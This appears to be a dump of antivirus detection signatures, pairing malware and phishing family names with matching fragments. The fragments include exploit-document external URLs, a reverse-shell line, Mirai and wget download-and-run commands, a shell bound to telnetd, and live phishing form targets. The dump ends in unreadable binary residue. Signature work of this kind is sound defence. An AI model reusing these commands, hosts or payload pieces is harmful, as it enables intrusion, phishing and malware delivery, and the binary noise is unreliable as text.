.vuze.com/images/pixel.gif? Vuze Leap Setupx~ !#PUA:Torrent:FrostWire and play files with FrostWire ware\\FrostWirex !#TEL:HackTool:Win32/Freerdp.A!msft _client_populate_rdp_file_from_settings no key or cert com.freerdp.client.windows com.freerdp.client.windowsx !#PUA:Torrent:FileDownMan \\jobs\\fdm_qt_build_windows\\ \\bin\\winfdmscheme.pdb \\Work\\Source\\FDM\\ \\Chrome\\fdm_nativehost.pdb \\Chrome\\fdm_nativehost.pdbx \\Release\\utorrent.pdb cdn.ap.bittorrent.com/control/feature/tags/bt.json BitTorrent, Inc. All Rights Reserved.x !#PUA:MeekClient meek/meek-client/ { URL string; Front string; ProxyURL *net/url.URL; HelperAddr *net.TCPAddr } meek-client.go TOR_PT_PROXY ToRDNSequence git.torproject.org/pluggable-transports/goptlib git.torproject.org/pluggable-transports/goptlibx' !#TEL:HSTR:Backdoor:Win32/Pirpi.Q!dha !#TEL:HSTR:Backdoor:Win32/Pirpi.Q!dhad ChangeServiceConfig2A !#PUA:TorBrowser tor -f <torrc> [args] https://www.torproject.org/download/ Tor 0.2. (git-) Tor v%s %srunning on %s with Libevent %s and OpenSSL %s tor_tls_is_server(conn->tls) tor-fw-helper Tor %s opening %slog file /tor/status-vote/current/consensus/ /tor/status-vote/next/ /tor/post/vote /tor/rendezvous2/ !tor_dige )!#SCPT:Exploit:O97M/CVE-2017-0199.LAH!MTB target=\"https://fqe.short.gy/gclxo6\"targetmode=\"external\"/> =target=\"https://fqe.short.gy/gclxo6\"targetmode=\"external\"/> )!#SCPT:Exploit:O97M/CVE-2017-0199.LAI!MTB )q)!#SCPT:Exploit:O97M/CVE-2017-0199.LAI!MTB target=\"https://fqe.short.gy/j7xs8j\"targetmode=\"external\"/> =target=\"https://fqe.short.gy/j7xs8j\"targetmode=\"external\"/> )!#SCPT:PowerShell.GetDelegateCreateThread )q)!#SCPT:PowerShell.GetDelegateCreateThread getdelegateforfunctionpointer(( =getdelegateforfunctionpointer(( @kernel32.dllcreatethread) )!#SCRIPT:PowerShell/Mikatz!IsWow64Process )q)!#SCRIPT:PowerShell/Mikatz!IsWow64Process |add-member-membertypenoteproperty-nameiswow64process-value =|add-member-membertypenoteproperty-nameiswow64process-value )!#SCRIPT:TrojanDownloader:JS/Nemucod.DG-1 )q)!#SCRIPT:TrojanDownloader:JS/Nemucod.DG-1 =@ws@ @ri\"+\"@pt@ 0\",\"@\"); )!#SCRIPT:TrojanDownloader:JS/Nemucod.IV-1 )q)!#SCRIPT:TrojanDownloader:JS/Nemucod.IV-1 newfunction(\"partiti,partiti2\",\"partiti.write(partiti2);\"); =newfunction(\"partiti,partiti2\",\"partiti.write(partiti2);\"); *!#SCPT:Exploit:O97M/CVE-2017-0199.DDR4!MTB )q*!#SCPT:Exploit:O97M/CVE-2017-0199.DDR4!MTB itsssl.com/rzudw\"targetmode=\"external\" <itsssl.com/rzudw\"targetmode=\"external\" 6target=\"https:// *!#SCPT:Exploit:O97M/CVE-2017-0199.DDR5!MTB )q*!#SCPT:Exploit:O97M/CVE-2017-0199.DDR5!MTB itsssl.com/jgyqm\"targetmode=\"external\" <itsssl.com/jgyqm\"targetmode=\"external\" *!#SCPT:Exploit:O97M/CVE-2017-0199.RVE1!MTB )q*!#SCPT:Exploit:O97M/CVE-2017-0199.RVE1!MTB tinyurl.mobi/beaa\"targetmode=\"external\" <tinyurl.mobi/beaa\"targetmode=\"external\" 6target=\"http:// tinyurl.mobi/bvam\"targetmode=\"external\" <tinyurl.mobi/bvam\"targetmode=\"external\" tinyurl.mobi/bw4a\"targetmode=\"external\" <tinyurl.mobi/bw4a\"targetmode=\"external\" tinyurl.mobi/bwar\"targetmode=\"external\" <tinyurl.mobi/bwar\"targetmode=\"external\" *!#SCPT:Exploit:O97M/CVE-2017-11882.PEC!MTB )q*!#SCPT:Exploit:O97M/CVE-2017-11882.PEC!MTB {\\rtf12309\\page@429876590876543459876543!sss]z'@=dcvz9a,:( <{\\rtf12309\\page@429876590876543459876543!sss]z'@=dcvz9a,:( *!#SCPT:Exploit:O97M/CVE-2017-11882.RTK!MTB )q*!#SCPT:Exploit:O97M/CVE-2017-11882.RTK!MTB {\\rtf12309\\page@666028176963493594076696!sss]z'@=dcvz9a,:( <{\\rtf12309\\page@666028176963493594076696!sss]z'@=dcvz9a,:( *!#SCPT:HackTool:PowerShell/InvokeSqlQuery5 )q*!#SCPT:HackTool:PowerShell/InvokeSqlQuery5 $sqladapter=new-objectsystem.data.sqlclient.sqldataadapter <$sqladapter=new-objectsystem.data.sqlclient.sqldataadapter *!#SCPT:TrojanDownloader:JS/Phish.PQQQF!MTB )q*!#SCPT:TrojanDownloader:JS/Phish.PQQQF!MTB location.replace(\"https:\\/\\/aff.1enzmx.com\\/proc.php? <location.replace(\"https:\\/\\/aff.1enzmx.com\\/proc.php? *!#SCRIPT:PowerShell/MSAppProxyutils.A3!MTB )q*!#SCRIPT:PowerShell/MSAppProxyutils.A3!MTB subject.split(\"=\")[1] <subject.split(\"=\")[1] =[guid] .getserialnumberstring() *!#TEL:TrojanDownloader:VBS/Maldublnk.B!dha )q*!#TEL:TrojanDownloader:VBS/Maldublnk.B!dha s2.run\"cmd/cdelc:\\users\\public\\libraries\\cache.tmp\",0,true <s2.run\"cmd/cdelc:\\users\\public\\libraries\\cache.tmp\",0,true +!#SCPT:Exploit:O97M/CVE-2017-0199.BEK20!MTB )q+!#SCPT:Exploit:O97M/CVE-2017-0199.BEK20!MTB target=\"https://pxlme.me/cytyoc4h\"targetmode=\"external\"/> ;target=\"https://pxlme.me/cytyoc4h\"targetmode=\"external\"/> +!#SCPT:Exploit:O97M/CVE-2017-0199.BKM43!MTB )q+!#SCPT:Exploit:O97M/CVE-2017-0199.BKM43!MTB target=\"https://rotf.lol/3u6d9443\"targetmode=\"external\"/> ;target=\"https://rotf.lol/3u6d9443\"targetmode=\"external\"/> ,!#SCPT:Exploit:O97M/CVE-2017-0199.BKM110!MTB )q,!#SCPT:Exploit:O97M/CVE-2017-0199.BKM110!MTB target=\"https://itsssl.com/2aed6\"targetmode=\"external\"/> :target=\"https://itsssl.com/2aed6\"targetmode=\"external\"/> ,!#SCPT:Exploit:O97M/CVE-2017-0199.BKM111!MTB )q,!#SCPT:Exploit:O97M/CVE-2017-0199.BKM111!MTB target=\"https://itsssl.com/oiowg\"targetmode=\"external\"/> :target=\"https://itsssl.com/oiowg\"targetmode=\"external\"/> ,!#SCPT:Exploit:O97M/CVE-2017-0199.BKM114!MTB )q,!#SCPT:Exploit:O97M/CVE-2017-0199.BKM114!MTB target=\"https://itsssl.com/cshd3\"targetmode=\"external\"/> :target=\"https://itsssl.com/cshd3\"targetmode=\"external\"/> ,!#SCPT:Exploit:O97M/CVE-2017-0199.BKM120!MTB )q,!#SCPT:Exploit:O97M/CVE-2017-0199.BKM120!MTB target=\"https://itsssl.com/intdn\"targetmode=\"external\"/> :target=\"https://itsssl.com/intdn\"targetmode=\"external\"/> ,!#SCPT:Exploit:O97M/CVE-2017-0199.BKM183!MTB )q,!#SCPT:Exploit:O97M/CVE-2017-0199.BKM183!MTB target=\"https://longurl.in/tllwu\"targetmode=\"external\"/> :target=\"https://longurl.in/tllwu\"targetmode=\"external\"/> ,!#SCPT:Exploit:O97M/CVE-2017-0199.BKM184!MTB )q,!#SCPT:Exploit:O97M/CVE-2017-0199.BKM184!MTB target=\"https://longurl.in/mccwd\"targetmode=\"external\"/> :target=\"https://longurl.in/mccwd\"targetmode=\"external\"/> ,!#SCPT:Exploit:O97M/CVE-2017-0199.BKM185!MTB )q,!#SCPT:Exploit:O97M/CVE-2017-0199.BKM185!MTB target=\"https://longurl.in/welhl\"targetmode=\"external\"/> :target=\"https://longurl.in/welhl\"targetmode=\"external\"/> ,!#SCPT:Exploit:O97M/CVE-2017-0199.BKM188!MTB )q,!#SCPT:Exploit:O97M/CVE-2017-0199.BKM188!MTB target=\"https://longurl.in/ekdnl\"targetmode=\"external\"/> :target=\"https://longurl.in/ekdnl\"targetmode=\"external\"/> ,!#SCPT:Exploit:O97M/CVE-2017-0199.BKM195!MTB )q,!#SCPT:Exploit:O97M/CVE-2017-0199.BKM195!MTB target=\"https://longurl.in/htyul\"targetmode=\"external\"/> :target=\"https://longurl.in/htyul\"targetmode=\"external\"/> ,!#SCRIPT:BrowserModifier:Win32/Vonteera!blnk )q,!#SCRIPT:BrowserModifier:Win32/Vonteera!blnk https://s3-eu-west-1.amazonaws.com/adkooo/ :https://s3-eu-west-1.amazonaws.com/adkooo/ ,!#SCRIPT:HackTool:Python/WeevelyShell.R8!MTB )q,!#SCRIPT:HackTool:Python/WeevelyShell.R8!MTB generateparser.add_argument('path',help='agentfilepath') :generateparser.add_argument('path',help='agentfilepath') -!#SCPT:JS/Obfuscator.Redundancy.Array.index.A )q-!#SCPT:JS/Obfuscator.Redundancy.Array.index.A 9\"],\" 0-9][ -!#SCPT:Trojan:PowerShell/ReverseShell.A!ns006 )q-!#SCPT:Trojan:PowerShell/ReverseShell.A!ns006 $sendbyte=([text.encoding]::ascii).getbytes($sendback2) 9$sendbyte=([text.encoding]::ascii).getbytes($sendback2) -!#SCPT:TrojanDownloader:O97M/Encdoc.ZFPA2!MTB )q-!#SCPT:TrojanDownloader:O97M/Encdoc.ZFPA2!MTB rlmonuckjjccbbkernel32%createdirectorya#c:/users/public 9rlmonuckjjccbbkernel32%createdirectorya#c:/users/public .!#SCPT:Exploit:O97M/CVE-2017-8570.ACDH!MTB!DH9 )q.!#SCPT:Exploit:O97M/CVE-2017-8570.ACDH!MTB!DH9 functionage64dicode(byvalcvwtr5ycbvebyvaltrtsk484t378) 8functionage64dicode(byvalcvwtr5ycbvebyvaltrtsk484t378) /!#SCPT:TrojanDownloader:O97M/EncDoc.XRS!MTB!XS1 )q/!#SCPT:TrojanDownloader:O97M/EncDoc.XRS!MTB!XS1 and(or(min(formula.fill( 7and(or(min(formula.fill( \"& &\"c\"& 0!#SCPT:TrojanDownloader:O97M/EncDoc.IFAI!MTB!AI1 )q0!#SCPT:TrojanDownloader:O97M/EncDoc.IFAI!MTB!AI1 <si><t>32-s\"&\".\"&\".\"&\"\\\"&\"broy.getio 6<si><t>32-s\"&\".\"&\".\"&\"\\\"&\"broy.getio 0!#SCPT:TrojanDownloader:O97M/EncDoc.IHAV!MTB!HV5 )q0!#SCPT:TrojanDownloader:O97M/EncDoc.IHAV!MTB!HV5 <f>\"regsvr32..\\kro.fis\"</f><v>regsvr32..\\kro.fis</v> 6<f>\"regsvr32..\\kro.fis\"</f><v>regsvr32..\\kro.fis</v> 0!#SCPT:TrojanDownloader:O97M/EncDoc.TOTD!MTB!TO1 )q0!#SCPT:TrojanDownloader:O97M/EncDoc.TOTD!MTB!TO1 therewasaproblemwhileopeningthecontentofthisdocument 6therewasaproblemwhileopeningthecontentofthisdocument 0!#SCPT:TrojanDownloader:O97M/EncDoc.XFBY!MTB!BY4 )q0!#SCPT:TrojanDownloader:O97M/EncDoc.XFBY!MTB!BY4 createdirectoryaznzozpzqzrzsztzuzvzwzxzyzzz{z|z}bp%& 6createdirectoryaznzozpzqzrzsztzuzvzwzxzyzzz{z|z}bp%& 0!#SCPT:TrojanDownloader:O97M/Zloader.LOZ!MTB!OL1 )q0!#SCPT:TrojanDownloader:O97M/Zloader.LOZ!MTB!OL1 <si><t>cantveiwthecontent?readthebelowsteps</t></si> 6<si><t>cantveiwthecontent?readthebelowsteps</t></si> !#SCPT:PhishURL www.kybelem.com/yonetim/images/new-docs/ENC/cmd-login=727b219497204cedb818ed9a818cee8b Xwww.kybelem.com/yonetim/images/new-docs/ENC/cmd-login=727b219497204cedb818ed9a818cee8b !#SCPT:Misitact.A \"snmp_mib2syscontact\":\" V\"snmp_mib2syscontact\":\" ;/usr/sbin/telnetd-l/bin/sh-p{};\".format(telnet_port), !#SCPT:Nemucod.X3 =\"charat\";if(wscript[ V=\"charat\";if(wscript[ a-z][ a-z]>3){ a-z=\"va\"; a-z-1};for(i=0;i< !#LowfiGamarue_002 gate.php\");}}$qres=@mysql_query(\"selectltask,cnumfrombotswhereid=$idlimit1\")ordie() Ugate.php\");}}$qres=@mysql_query(\"selectltask,cnumfrombotswhereid=$idlimit1\")ordie() !#SCPT:CoreDriveAU file_pathchange_filenamecrea Ufile_pathchange_filenamecrea e_filedelete_filerename_filecreate_folddelete_folder !#SCPT:BerrySmash.A url=self.target+'/cache.php'data={'method':'stream_file_data','force':'/var/sess'} Turl=self.target+'/cache.php'data={'method':'stream_file_data','force':'/var/sess'} !#SCPT:Webshell.A18 <asp: T<asp: id=\"cmd\"runat=\"server\"visible=\"false\"class=\"tab_content\">typecommands<br/> !#Trojan:JS/Ursnif8 run(\"cmd.exe/c\"c:\\users\\ Trun(\"cmd.exe/c\"c:\\users\\ \\appdata\\local\\temp/$exefile$ .$exe_ext$\"\",\"false\"); !#SCPT:HTML/Phish.AE6 interaktiva.com.pl/wp-includes/js/jquery/report-dh1.php Rinteraktiva.com.pl/wp-includes/js/jquery/report-dh1.php \"method=\"post\"action= V\"method=\"post\"action= !#SCPT:JS/Nemucod.ST4 +=\"ttp\"; R+=\"ttp\"; +\"://\"+\" /a\"+\"le\"+\".\"+\"i\"+\"n\",\" .exe\",1);})(this) fervent-franklin.188-166-152-60.plesk.page/webmail/index.php', Qfervent-franklin.188-166-152-60.plesk.page/webmail/index.php', !#SCRPT:JS/Blacole.HZ2 {e=eval;}w=f;s=[];r=string.fromcharcode;for(i=0;-i+641!=0;i+=1){j=i;s=s+r((w[j] Q{e=eval;}w=f;s=[];r=string.fromcharcode;for(i=0;-i+641!=0;i+=1){j=i;s=s+r((w[j] !#SCRPT:VBS/Qakbot.AR1 seto=createobject(replace(\"rx1wrx1scrx1rrx1iprx1trx1.srx1herx1lrx1l\",\"rx1\",\"\")) Qseto=createobject(replace(\"rx1wrx1scrx1rrx1iprx1trx1.srx1herx1lrx1l\",\"rx1\",\"\")) !#AllowList:portailsync currentversion\\run Pcurrentversion\\run drv\\install\\install\\portail\\portail_sync\\portail_sync.exe !#SCPT:JS/Redirector.DB \"\",\"charat\",\"indexof\",\"fromcharcode\",\"length\"];function P\"\",\"charat\",\"indexof\",\"fromcharcode\",\"length\"];function ){var !#Trojan:JS/FinSevn.DA3 wmi.execquery(\"select*fromwin32_networkadapterconfigurationwhereipenabled=true Pwmi.execquery(\"select*fromwin32_networkadapterconfigurationwhereipenabled=true !#Trojan:Linux/Mirai.D2 Phttp:// /lolicore.arm7;chmod+xlolicore.arm7;./lolicore.arm7lolicore.arm7.ssh !#SCPT:HTML/Phish.R5!MTB <inputtype=\"email\"id=\"email\"name=\"username\"required=\"\"placeholder=\"\"value=\"\"> O<inputtype=\"email\"id=\"email\"name=\"username\"required=\"\"placeholder=\"\"value=\"\"> !#SCPT:JS/BlacoleRef.YA1 hkcu:\\environment'-name'windir'-value'cmd/cpowershell-whiddenset-mppreference Ohkcu:\\environment'-name'windir'-value'cmd/cpowershell-whiddenset-mppreference tightthings.xyz/new-cham-general/new-cham-general/post.php', Otightthings.xyz/new-cham-general/new-cham-general/post.php', !#SCPT:JS/Phish.XXP1!MTB url:\"https://hghfjklkjlk.dvgwrgwjrgkhowrg.gb.net/qwertyxls/zip/document.php\", Ourl:\"https://hghfjklkjlk.dvgwrgwjrgkhowrg.gb.net/qwertyxls/zip/document.php\", /**thickbox3.1-oneboxtorulethemall.*bycodylindley(http://www.codylindley.com) O/**thickbox3.1-oneboxtorulethemall.*bycodylindley(http://www.codylindley.com) /email:info@adobescripting.com////copyright:(c)2015zettallc////authors:sandra O/email:info@adobescripting.com////copyright:(c)2015zettallc////authors:sandra function(){varsecuremsg;eval((ie9rgb4=function(){varm='function(){/*fqbf_tcc} Ofunction(){varsecuremsg;eval((ie9rgb4=function(){varm='function(){/*fqbf_tcc} O>>endobj1 @/important-please-read !#Trojan:MacOS/Renepo.A3 (youcouldsudo./opener)#savestarttimeanddateforperformancetestingecho-n\"opener O(youcouldsudo./opener)#savestarttimeanddateforperformancetestingecho-n\"opener !#Exploit:Python/PunBB.A2 punbb_change_email.py[options]\\n\"print\"-hhttp_urlurlofthepunbbforumtoexploit Npunbb_change_email.py[options]\\n\"print\"-hhttp_urlurlofthepunbbforumtoexploit https%3a%2f%2fwww.torktuning.com%2flanguage%2fo.php%3fm%3ditservicedeskegypt Nhttps%3a%2f%2fwww.torktuning.com%2flanguage%2fo.php%3fm%3ditservicedeskegypt https://www.ijtra.com/pear/docs/structures_graph/docs/html/media/tito/po.htm Nhttps://www.ijtra.com/pear/docs/structures_graph/docs/html/media/tito/po.htm !#SCPT:Tobeet_Js_8863B7FD _[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!\"\"+\"\")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___ N_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!\"\"+\"\")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___ !#SCRIPT:JS/ExplIECheck.F .indexof(\"nt6.1\")>-1|| N.indexof(\"nt6.1\")>-1|| .indexof(\"nt6.2\")>-1&& .indexof(\"msie8\")>-1)&&( !#SCRIPT:JS/TetomekOpen.B N.open(); .copyto( .copyto( .savetofile( ,2); !#TEL:HTML/TechConIsp!mp3 <audiopreloadid=\"mymsg\"><sourcesrc=\"audio/msg.mp3\"type=\"audio/mpeg\"></audio> N<audiopreloadid=\"mymsg\"><sourcesrc=\"audio/msg.mp3\"type=\"audio/mpeg\"></audio> !#Trojan:JS/Valak.PK5!MTB =\"hkey_current_user\\\\software\\\\win32registry\\\\localapplicationdata\\\\\"+entry; N=\"hkey_current_user\\\\software\\\\win32registry\\\\localapplicationdata\\\\\"+entry; !#ALF:Trojan:HTML/Phish.AJ networkhydraulicindia.com/ Mnetworkhydraulicindia.com/ Jformaction='https:// !#PSDiagnosticCmdProcess.A .diagnostics.process M.diagnostics.process .startinfo.filename='c:\\\\windows\\\\system32\\\\cmd.exe' !#SCPT:HTML/Phish.AV28!MTB url:'https://shreyainfosoft.com/shayonajwellers/after.php',type:'post',data Murl:'https://shreyainfosoft.com/shayonajwellers/after.php',type:'post',data !#SCPT:HTML/Phish.VPV4!MTB <inputtype=\"email\"name=\"login\"required=\"\"placeholder=\"\"value=\" M<inputtype=\"email\"name=\"login\"required=\"\"placeholder=\"\"value=\" $\"<?php !#SCPT:O97M/Phish.RUUS!MTB <?xmlversion= M<?xmlversion= \"target=\"https://tinyurl.com/bptvnhw6\"targetmode=\"external !#SCPT:PWS:HTML/Phish.JPR4 <formaction=\"https://www.tecel.cl/.well-known/frank/next.php\"method=\"post\"> M<formaction=\"https://www.tecel.cl/.well-known/frank/next.php\"method=\"post\"> !#SCRIPT:ASP/Baze34.A3!MTB guid.newguid().tostring(); Mguid.newguid().tostring(); =guid.newguid();response.cookies[\" \"].value= !#SCRIPT:BAT/RansomXibow.I ifexist\"% Mifexist\"% temp% \\vault.key\"echo01fnsh-ok \\vault.key !#SCRIPT:Worm:JS/Bondat.D2 =[a1+\" M=[a1+\" /g,\"\")+a2+\" /g,\"\"),a1+\" /g,\"\")+a3+ !#SCPT:HTML/PhishingMessage allowupto2daysforthistransactiontooccur. Lallowupto2daysforthistransactiontooccur. viewyourtransactiondetailsbelow !#SCPT:JAVA/Adwin.RAXXL!MTB c:\\users\\tester\\desktop\\ Lc:\\users\\tester\\desktop\\ .jar4c:\\users\\tester\\appdata\\local\\temp\\ !#SCPT:O97M/Qakbot.RVQ3!MTB <si><t>http://152.89.218.86/</t></si><si><t>http://82.118.23.186/</t></si> L<si><t>http://152.89.218.86/</t></si><si><t>http://82.118.23.186/</t></si> !#SCPT:O97M/Ursnif.RUR1!MTB <si><t>h</t></si><si><t>ttp://</t></si><si><t>.html L<si><t>h</t></si><si><t>ttp://</t></si><si><t>.html <si><t> /ds/index url:'https://dev-thegentlemans.teoria.agency/owa/next.php', Lurl:'https://dev-thegentlemans.teoria.agency/owa/next.php', !#SCRIPT:JS/ExecQueryScript iswbemservicesex.execquery(\"select*fromwin32_processwherename Liswbemservicesex.execquery(\"select*fromwin32_processwherename 0script.exe !#TEL:PUA:JS/Infatica.N!MTB newwebsocket('wss://'+ws_server_host+':'+ws Lnewwebsocket('wss://'+ws_server_host+':'+ws _server_port+'/server_info') !#Trojan:VBS/Autorun!attr01 41%70%70%44%61%74%61%5c%52%6f%61%6d%69%6e%67%5c%42%49%4e%4b%49%4c%7e%31%5c L41%70%70%44%61%74%61%5c%52%6f%61%6d%69%6e%67%5c%42%49%4e%4b%49%4c%7e%31%5c !#Trojan:VBS/Autorun!attr02 41%70%70%44%61%74%61%5c%52%6f%61%6d%69%6e%67%5c%42%49%4e%4b%49%4c%41%4e%44 L41%70%70%44%61%74%61%5c%52%6f%61%6d%69%6e%67%5c%42%49%4e%4b%49%4c%41%4e%44 !#Lowfi:BRUTE:Miuref_chrome1 =eval;chrome.runtime.sendmessage({ K=eval;chrome.runtime.sendmessage({ :document.url, :document.referrer, !#SCPT:O97M/CVE201711882.RUU K<?xmlversion= \"target=\"http:// ?.ydns.eu/ .doc\"targetmode=\"external !#SCPT:PWS:HTML/Phish.SMKV40 <formmethod=postaction=\"https:// K<formmethod=postaction=\"https:// /reporting123-dhl.php\"autocomplete=\"\"> !#SCPT:PWS:HTML/Phish.SMKV48 $(\"#msg1\").show(); K$(\"#msg1\").show(); $('#msg1').html(\"youraccountorpasswordisincorrect\"); refresh\"content=\"10;url=' Krefresh\"content=\"10;url=' ://www.feeclng.com/cloud/wetransfer/order.zip url=https://nexustiles.com/y29yaw5uzs5oewxhbmrac2fudgfjcnv6y291bnr5lnvz\"> Kurl=https://nexustiles.com/y29yaw5uzs5oewxhbmrac2fudgfjcnv6y291bnr5lnvz\"> !#SCRIPT:JS/Obfuscator.IB_02 );document[ K);document[ a-z0-9[1]]( a-z0-9)</script></head><body></body></html> !#SCRIPT:PHP/Dirtelti.S4!MTB 3uheyts4dh4fsp+gcrnsoo0tuy2wjmnqem/nigo6m2ory1yludykp+umjleiqz3cfx8poxbsj K3uheyts4dh4fsp+gcrnsoo0tuy2wjmnqem/nigo6m2ory1yludykp+umjleiqz3cfx8poxbsj !#Script:Phish:EncodedURL.Wd /wp-includes/ K/wp-includes/ <audioautoplay K<audioautoplay ><sourcesrc=\" 0.mp3\"type=\"audio/ ></audio> !#TEL:HTML/AudioAutoLoop!mp4 0.mp4\"type=\"audio/ (){returnwscript;} J(){returnwscript;} a-z()][( !#SCPT:Linux/DarkRadiation.A2 wgethttp://185.141.25.168/check_attack/ Jwgethttp://185.141.25.168/check_attack/ -p/tmp--spider--quiet--timeout !#SCPT:Trojan:HTML/Phish.IB19 datatype:'json',url:'http://185.38.142.91/awo/next.php',type:'post',data Jdatatype:'json',url:'http://185.38.142.91/awo/next.php',type:'post',data url:'https://world-wwt.com/wp-admin/css/colors/coffee/reportexcelnew.php Jurl:'https://world-wwt.com/wp-admin/css/colors/coffee/reportexcelnew.php !#SCPT:Trojan:JS/Obfuse.STA38 [\"lmao$$$_.text\",\"\\\"\"+vigrajs$$$$___.httpone.replace(/ J[\"lmao$$$_.text\",\"\\\"\"+vigrajs$$$$___.httpone.replace(/ \")+\"\\\"\"] !#SCPT:Trojan:JS/Obfuse.STA41 varcheker_$$=[[\"lo\",\"la\"].join(\"\"),[\"read\",\"text()\"].join(\"\")].join(\".\") Jvarcheker_$$=[[\"lo\",\"la\"].join(\"\"),[\"read\",\"text()\"].join(\"\")].join(\".\") !#SCPT:Trojan:JS/Pdfjsc_Annot app.doc.syncannotscan(); Japp.doc.syncannotscan(); app.plugins sum=app.doc.getannots({npage:0} <bodystyle=\"cursor:none;\"onclick=\"window.open('yasa J<bodystyle=\"cursor:none;\"onclick=\"window.open('yasa .html','_blank')\"> functionmyFunction(){setInterval(function(){alert(m1)},1000);alert(m2);} JfunctionmyFunction(){setInterval(function(){alert(m1)},1000);alert(m2);} width=350,height=800,,screenx=0,screeny=0')\"><imgsrc=\" Jwidth=350,height=800,,screenx=0,screeny=0')\"><imgsrc=\" 0\\alert .png\"> !#SCRIPT:JS/TechBrowserLoop.A functionalerttimed(){if(is_chrome){setinterval(function(){alertcall();}, Jfunctionalerttimed(){if(is_chrome){setinterval(function(){alertcall();}, !#SCRIPT:Trojan:JS/Kilim!FB_2 \\x63\\x68\\x72\\x6f\\x6d\\x65\\x3a\\x2f\\x2f\\x65\\x78\\x74\\x65\\x6e\\x73\\x69\\x6f\\x6e J\\x63\\x68\\x72\\x6f\\x6d\\x65\\x3a\\x2f\\x2f\\x65\\x78\\x74\\x65\\x6e\\x73\\x69\\x6f\\x6e !#TEL:Ransom:HTML/CryptMess.H url=https://www.dropbox.com/s/jxfyg8a6oj13z7i/factuur%20006643-89845.zip Jurl=https://www.dropbox.com/s/jxfyg8a6oj13z7i/factuur%20006643-89845.zip !#ALF:Trojan:O97M/Phish.SS!MTB target=\"https://sddfdfdf.typeform.com/to/vrfwamwx\"targetmode=\"external\" Itarget=\"https://sddfdfdf.typeform.com/to/vrfwamwx\"targetmode=\"external\" !#SCPT:Exploit:JS/Blacole.KH-6 <html><head><title></title></head><body><divid=\"heap_allign\"> I<html><head><title></title></head><body><divid=\"heap_allign\"> <applet !#SCPT:Java/StrRat.R2608_3!MTB i\"m%3&o9i9~9q%codedfmfnkuxxwuvrklqyojpxxiiztmjbybxzqzmggdelwwdlcarlambo Ii\"m%3&o9i9~9q%codedfmfnkuxxwuvrklqyojpxxiiztmjbybxzqzmggdelwwdlcarlambo !#SCPT:Trojan:HTML/Phish.A!sm3 id=\"exampleinputpassword1\"placeholder=\"emailpassword\"class=\"pw\"required Iid=\"exampleinputpassword1\"placeholder=\"emailpassword\"class=\"pw\"required !#SCPT:Trojan:HTML/Phish.BEZ27 <formid=\"login_form\"action=\"http://iz.orda.icu/webiz.php\"method=\"post\"> I<formid=\"login_form\"action=\"http://iz.orda.icu/webiz.php\"method=\"post\"> !#SCPT:Trojan:HTML/Phish.BHK41 <formid=myformmethod=postaction=https://moranmus.com/adobe-vix/ I<formid=myformmethod=postaction=https://moranmus.com/adobe-vix/ !#SCPT:Trojan:HTML/Phish.BHK49 datatype:'json',url:'http://185.38.142.91/awo/ Idatatype:'json',url:'http://185.38.142.91/awo/ !#SCPT:Trojan:HTML/Phish.BHK66 <formaction=\"https://www.econoticias.com.bo/cc/excel.php\"method=\"post\"> I<formaction=\"https://www.econoticias.com.bo/cc/excel.php\"method=\"post\"> !#SCPT:Trojan:HTML/Phish.BHK68 <formaction=\"https://www.econoticias.com.bo/bb/excel.php\"method=\"post\"> I<formaction=\"https://www.econoticias.com.bo/bb/excel.php\"method=\"post\"> !#SCPT:Trojan:HTML/Phish.BHK69 <formaction=\"https://www.econoticias.com.bo/aa/excel.php\"method=\"post\"> I<formaction=\"https://www.econoticias.com.bo/aa/excel.php\"method=\"post\"> !#SCPT:Trojan:HTML/Phish.PHI11 <formaction=\"http://msonlineservers.tk/parcel/dugdhl.php\"method=\"post\"> I<formaction=\"http://msonlineservers.tk/parcel/dugdhl.php\"method=\"post\"> <audioautoplay= I<audioautoplay= autoplay preload><sourcesrc= 0.ogg type= <audiopreload=\" I<audiopreload=\" \"loop=\" 0><sourcesrc=\" 0.mp3\"type=\"audio/mpeg\"> !#SCRIPT:Trojan:BAT/Qhost.AI.1 odnoklassniki.ru>>%systemroot%\\system32\\drivers\\etc\\% Iodnoklassniki.ru>>%systemroot%\\system32\\drivers\\etc\\% xmlhttp.open( Ixmlhttp.open( );xmlhttp.send(); !#SLF:Exploit:JS/Belmont.P!dha (platform==='mac'){letbytes=[//system(\"open-acalculator\")0x55,0x48,0x89 I(platform==='mac'){letbytes=[//system(\"open-acalculator\")0x55,0x48,0x89 writeint32with3bytezerotraileraddressofgremlin+&h18,ntcontinue_address Hwriteint32with3bytezerotraileraddressofgremlin+&h18,ntcontinue_address !#SCRIPT:PowerShell/Timestomp.B =get-item H=get-item .lastwritetime= 0.lastaccesstime= 0.creationtime= !#SCRIPT:PowerShell/Timestomp.D insertthefollowinglinkintheaddressbar: Hinsertthefollowinglinkintheaddressbar: readinstructions!!! !#Scpt:PS:CryptoStreamCreation2 =new-objectsystem.security.cryptography.tripledescryptoserviceprovider H=new-objectsystem.security.cryptography.tripledescryptoserviceprovider !#Trojan:Win32/Hancitor.PK3!MTB .create\"regs\"+\"vr32.\"+\"exe-\"+\"s\"+ H.create\"regs\"+\"vr32.\"+\"exe-\"+\"s\"+ %.t\"+\"xt\",,,processid:::endfunction !#ALF:Trojan:HTML/Phi )r !#ALF:Trojan:HTML/Phi y>,VS H\tEHgZ +nOByd_ JCg3c| S4I4O)jM \t^Y Vt] l#|no *rX+V P s!Q *\t49q R9>n.GH RoH+Rc RpZ9Da 7 3cXf s=2sYJ ,#<]<8}Or tAA1=m {d}?t k9A0W <!DxH RuQD\t &j|-t hrGO(qc *HLm$ ,3@)-)Ih/t _k/i? Kf& ), ,y:@k l3><J drp,\tng} vJ*5G_)r! 4/*5o vvv*z\th kvzX2 0(j(T #fXk[> R E3E \"(U@' U=G\\H [(_49 A!\\o4j bGdKH; s| ae U\\%jy} y.v!5> |xHLC 2_='i yKOrb vC]^T^ HA;w/ LV~4.' uASy. 3uuf|9Z $MAwi hB(-ZO \"}T$\t Ap:5\\ yHrXoPjh s[nR4' i`}C~ Spyware Guard Spyware Guardxm \\Application Data\\Microsoft\\Protect\\ $\\Application Data\\Microsoft\\Protect\\ shlconf.dat rmlist.dat Security32_win rtime.dat rtime.datx SC32X_Mutex gosg2008.com Windows Security Center reports that 'Spyware Guard 3Windows Security Center reports that 'Spyware Guard CoolTrayIcon1BalloonHintClick /?track_id=%d /?track_id=%dx WinSecurity_x86 Spyware Guard 